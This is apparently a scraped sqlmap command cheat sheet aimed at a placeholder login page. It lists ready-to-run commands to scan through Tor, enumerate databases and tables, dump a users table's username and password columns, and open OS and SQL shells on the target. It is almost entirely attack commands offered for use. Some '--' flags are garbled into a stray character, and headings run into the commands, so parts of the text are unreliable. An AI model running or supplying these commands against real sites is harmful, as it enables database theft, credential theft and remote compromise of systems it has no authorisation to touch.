Easy Scanning optionsqlmap -u "http://testsite.com/login.php"Scanning by using torsqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5Scanning by manually setting the return timesqlmap -u "http://testsite.com/login.php" --time-sec 15
List all databases at the sitesqlmap -u "http://testsite.com/login.php" --dbsList all tables in a specific databasesqlmap -u "http://testsite.com/login.php" -D site_db --tablesDump the contents of a DB tablesqlmap -u "http://testsite.com/login.php" -D site_db -T users โdump
List all columns in a tablesqlmap -u "http://testsite.com/login.php" -D site_db -T users --columnsDump only selected columnssqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump
Dump a table from a database when you have admin credentialssqlmap -u "http://testsite.com/login.php" โmethod "POST" โdata "username=admin&password=admin&submit=Submit" -D social_mccodes -T users โdump
Get OS Shellsqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell
Get SQL Shellsqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell
Injecting site.xml pages
//Adjust according to underlying DB and target
sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"